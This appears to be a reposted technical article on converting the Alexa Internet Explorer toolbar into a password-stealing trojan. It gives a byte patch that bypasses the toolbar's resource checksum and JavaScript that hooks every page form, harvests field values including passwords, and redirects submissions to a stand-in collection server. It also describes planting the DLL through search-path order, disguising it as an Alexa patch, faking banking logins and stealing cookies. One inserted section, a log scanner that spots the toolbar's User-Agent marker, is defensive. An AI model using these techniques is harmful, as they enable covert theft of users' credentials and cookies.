Convert Alexa toolbar into a Trojan

Source: Internet
Author: User


From: http://www.neeao.com/blog/article-4118.html

Alexa is a website that publishes global website rankings (http://www.alexa.com). It collects access data from websites worldwide by installing the Alexa toolbar on client machines and ranks sites from that data, much like TV audience ratings. The Alexa toolbar is an Internet Explorer plug-in similar to the Google Toolbar; it can be downloaded from http://download.alexa.com/index.cgi.

1. How the Alexa toolbar works

The Alexa toolbar is an Internet Explorer plug-in built on the Browser Helper Object (BHO) and toolbar band technologies. It lives on the system as a DLL registered as a COM component, and IE loads it into its own process at run time. A personal firewall therefore generally cannot stop it from reaching the network, which is an inherent convenience for a trojan. It also has an advantage over collecting passwords with a local sniffer: whether the site is HTTP or HTTPS, whether or not the channel is encrypted, any form on a page rendered by IE can be collected, because the plug-in sees the form fields inside the browser before they are encrypted. For the detailed principles, see "Alexa ranking fraud solutions" (http://www.donews.net/tabris17/archive/2004/09/20/104018.aspx).

After the Alexa toolbar is installed, two DLL files appear in the system directory: alxtb1.dll and alxres.dll (in some cases alxtb2.dll instead of alxtb1.dll, because the toolbar updates itself online). The main binary code of the toolbar is in alxtb1.dll. That file is registered as several COM components: it implements the COM interfaces for the BHO and the toolbar band, and it wraps IE's WebBrowser control as a COM component for alxres.dll to call. alxres.dll contains only a small amount of binary code; most of it is HTML and JavaScript stored as resources inside the DLL. These resources can be reached through the res: protocol, for example res://alxres.dll/chtml/about.html.

You may wonder why a piece of software, not a website, is written in JavaScript. This is the cheap part of the Alexa toolbar: its main interface is implemented in HTML plus JavaScript, and that JavaScript calls the COM interfaces implemented by alxtb1.dll to perform every function of the software. The design is not only inefficient and prone to leaking resources, it is a thoroughly bad way to build software. For us, however, it makes the toolbar easy to modify: without any cracking knowledge, we can change the toolbar's code with nothing more than a PE resource editor.

2. Cracking the Alexa toolbar

Alexa is not that careless, of course; it would never let you change its code with a plain resource editor. To prevent the resources in alxres.dll from being modified at will, it protects the file with a checksum: if the file is found to have been modified, the toolbar refuses to load it. We must defeat this protection before modifying the code.

alxtb1.dll exports a function named checksumresources that calculates the file checksum. Disassemble alxres.dll with c32asm, open the string reference list, find the string "checksumresources" and jump to the code that references it at 100017c0. A few lines down, at 100017f6, there is a conditional jump. Use the brute-force method: overwrite the jnz instruction with NOPs. In plain terms, change the two bytes 75 11 at file offset 0x17f6 of alxres.dll to 90 90, using a hex editor such as WinHex.

100017c0: 68 9c700010     push 1000709c             ; -> "checksumresources" (referenced from 100017a4, 100017b1)
100017c5: 57              push edi
100017c6: ff15 1c500010   call [1000501c]           ; kernel32.dll:GetProcAddress
100017cc: 85c0            test eax, eax
100017ce: 74 0e           je short 100017de
100017d0: 8d4d dc         lea ecx, [ebp-0x24]
100017d3: 51              push ecx
100017d4: ff35 44740010   push dword ptr [10007444]
100017da: ffd0            call eax                  ; the checksumresources function pointer returned by GetProcAddress
100017dc: 59              pop ecx
100017dd: 59              pop ecx
100017de: 57              push edi                  ; referenced from 100017ce
100017df: ff15 18500010   call [10005018]           ; kernel32.dll:FreeLibrary
100017e5: 8d45 b8         lea eax, [ebp-0x48]
100017e8: 50              push eax
100017e9: 8d45 dc         lea eax, [ebp-0x24]
100017ec: 50              push eax
100017ed: e8 ae060000     call 10001ea0
100017f2: 59              pop ecx
100017f3: 85c0            test eax, eax
100017f5: 59              pop ecx
100017f6: 75 11           jnz short 10001809        ; modify this: 75 11 -> 90 90

Now the resources in alxres.dll can be modified freely. See also "Cracking method for the new version of the Alexa toolbar" (http://www.donews.net/tabris17/archive/2004/10/18/137121.aspx).

3. Modifying the Alexa toolbar code

Anyone familiar with IE programming knows that the DWebBrowserEvents2 interface is used to receive WebBrowser event notifications. The corresponding functions can be found in the JavaScript of alxres.dll: the file res://alxres.dll/script/evt.class.js contains a series of JavaScript functions that map to members of DWebBrowserEvents2, for example DocumentComplete -> bp_OnDocumentComplete, NavigateComplete2 -> bp_OnNavigateComplete and BeforeNavigate2 -> bp_OnBeforeNavigate. According to the DWebBrowserEvents2 interface we could intercept the POST data in BeforeNavigate2, but the code in alxres.dll does not implement this member completely. The prototype in DWebBrowserEvents2 is:

void BeforeNavigate2(IDispatch *pDisp,
                     VARIANT *&URL,
                     VARIANT *&Flags,
                     VARIANT *&TargetFrameName,
                     VARIANT *&PostData,
                     VARIANT *&Headers,
                     VARIANT_BOOL *&Cancel);

PostData carries the POST data. The prototype of bp_OnBeforeNavigate, however, is:

function bp_OnBeforeNavigate(oParentWebBrowser2, oWebBrowser2, sUrl, bPostData, sHeaders);

bPostData is only a Boolean flag, not the data itself, so the POST body cannot be obtained this way. Another method is needed.

In general, the user name and password entered in IE are submitted to the server through a form. If the content of the form can be intercepted before it is submitted, the password can be stolen. In JavaScript, handling the form's onsubmit event is enough to process the form's content before submission. Since alxres.dll is implemented in JavaScript, there is no need to deal with complicated COM interfaces; plain JavaScript does the job.

For modifying the resources in alxres.dll, Resource Hacker is recommended; it is far better than the alternatives.

4. Intercepting web page form content

The method used here resembles a cross-site scripting attack. Look at the bp_OnDocumentComplete function in res://alxres.dll/script/evt.class.js:

function bp_OnDocumentComplete(oParentWebBrowser2, oWebBrowser2, sUrl);

This function is called when the page IE is currently browsing has finished loading. The oWebBrowser2 parameter can be used as the window object of the page IE is displaying. If you know JavaScript, the next step is simple. Add the following code:

function bp_OnDocumentComplete(oParentWebBrowser2, oWebBrowser2, sUrl) {
    // ......
    try {
        // hook every form on the page that has just finished loading
        for (i = 0; i < oWebBrowser2.document.forms.length; i++)
        {
            oWebBrowser2.document.forms[i].onsubmit = test;
        }
    } catch (e) {}
    return false;
}

This code enumerates every form object on the current page and installs an onsubmit handler on each of them. The test function does the rest:

function test()
{
    try {
        window.alert("I can get the value!");
        // "this" is the form whose onsubmit handler fired
        for (i = 0; i < this.elements.length; i++)
        {
            if (this.elements[i].name != "")
            {
                window.alert(this.elements[i].name + ":" + this.elements[i].value);
                // do something
            }
        }
    } catch (e) {}
    return true;   // let the submission proceed so the user notices nothing
}

This method has a drawback, though: when a form is submitted from script with submit(), no onsubmit event fires, and the code above cannot record the form's content. You can work around that by changing the form's submission address:

function bp_OnDocumentComplete(oParentWebBrowser2, oWebBrowser2, sUrl) {
    // ......
    try {
        for (i = 0; i < oWebBrowser2.document.forms.length; i++)
        {
            // append a hidden field to the form (the markup of that field did not survive in the source)
            oWebBrowser2.document.forms[i].innerHTML = oWebBrowser2.document.forms[i].innerHTML + "";
            // redirect the submission to the collecting server
            oWebBrowser2.document.forms[i].action = "http://www.faketarget.com/gather.asp";
        }
    } catch (e) {}
    return false;
}

The code above breaks on some pages, and sometimes it is not possible to add hidden fields to a form.

5. Spreading and implanting the trojan

The code above is applied by editing the alxres.dll file with a PE resource editor, so all that is needed is to replace the existing alxres.dll with the modified one. When the Alexa toolbar loads, it looks for alxres.dll in "C:\Program Files\Internet Explorer" and "C:\Documents and Settings\[username]\Desktop" before the system directory, so the modified DLL can also be placed in either of those two paths and the original file need not be overwritten. As for how to get it installed, there are plenty of IE vulnerabilities waiting to be exploited; that is outside the scope of this article.

IE with the Alexa toolbar installed carries an "Alexa Toolbar" marker in its User-Agent, so it is easy to tell whether a target's IE has the toolbar installed:

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Alexa Toolbar)
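The same marker cuts both ways: a site administrator can run the check below over web-server access logs to see how many visitors expose this attack surface. This is an added example, not code from the original article; the log lines are constructed samples in Apache combined format, and the field layout and the case-insensitive match on "Alexa Toolbar" are the example's own assumptions.

```javascript
// Added example (not from the original article): flag clients whose User-Agent carries the
// Alexa Toolbar marker, using constructed Apache combined-format log lines.
// Combined format: client ident user [time] "request" status bytes "referer" "user-agent"
const COMBINED_LOG_RE =
  /^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/;

// The marker the article quotes; matched case-insensitively (an assumption, in case the token's case varies).
const ALEXA_MARKER = /alexa toolbar/i;

// Parse one combined-format line into its fields, or return null if it does not match.
function parseCombinedLogLine(line) {
  const m = COMBINED_LOG_RE.exec(line);
  if (!m) return null;
  return {
    client: m[1],
    time: m[2],
    request: m[3],
    status: Number(m[4]),
    referer: m[6],
    userAgent: m[7],
  };
}

// One entry per distinct client that presented the marker, with its request count and the
// first User-Agent seen. Unparseable lines are skipped rather than aborting the scan.
function findAlexaToolbarClients(lines) {
  const byClient = new Map();
  for (const line of lines) {
    const rec = parseCombinedLogLine(line);
    if (!rec || !ALEXA_MARKER.test(rec.userAgent)) continue;
    const entry = byClient.get(rec.client) || { client: rec.client, requests: 0, userAgent: rec.userAgent };
    entry.requests += 1;
    byClient.set(rec.client, entry);
  }
  return [...byClient.values()];
}

// Constructed sample lines (documentation addresses, not real traffic).
const SAMPLE_LOG = [
  '192.0.2.10 - - [20/Sep/2004:10:15:01 +0800] "GET /login.asp HTTP/1.1" 200 1532 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Alexa Toolbar)"',
  '192.0.2.10 - - [20/Sep/2004:10:15:09 +0800] "POST /login.asp HTTP/1.1" 302 211 "http://www.example.com/login.asp" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Alexa Toolbar)"',
  '198.51.100.7 - - [20/Sep/2004:10:16:40 +0800] "GET / HTTP/1.1" 200 4021 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
  '203.0.113.5 - - [20/Sep/2004:10:17:12 +0800] "GET /index.html HTTP/1.0" 200 4021 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20040910 Firefox/0.10"',
  'garbage line that does not parse',
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const c of findAlexaToolbarClients(SAMPLE_LOG)) {
    console.log(`${c.client}: ${c.requests} request(s) with "${c.userAgent}"`);
  }
}
```

Feed it real log lines with `fs.readFileSync(file, 'utf8').split('\n')`; the per-client aggregation keeps the output short even on busy servers.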

You can also modify the Alexa installer, or release the modified file under the name of an Alexa patch.

6. Collecting passwords

The form content can be written to a file with the FileSystemObject control, or sent directly as parameters to a web server that collects the records. To discard forms that contain no password on the client side, it is best to check the collected form data in the alxres.dll code:

function test()
{
    var isPwdForm = false;
    var formStr = "";   // must start empty, otherwise the first concatenation yields "undefined..."
    try {
        for (i = 0; i < this.elements.length; i++)
        {
            if (this.elements[i].name != "")
            {
                // a password field marks the form as worth collecting
                if (this.elements[i].type == "password")
                    isPwdForm = true;
                formStr = formStr + this.elements[i].name + "=" + this.elements[i].value + "&";
            }
        }
        if (isPwdForm)
        {
            // the form contains a password field: collect formStr here
        }
    } catch (e) {}
    return true;
}

7. Other applications

Most online banking login interfaces are implemented with ActiveX controls, so their form data cannot be intercepted this way. However, the page being browsed can still be manipulated and modified through the oWebBrowser2 object, and of course a fake online banking login interface can be displayed. The same approach can also be used to record the pages a user visits or to steal the user's cookies.
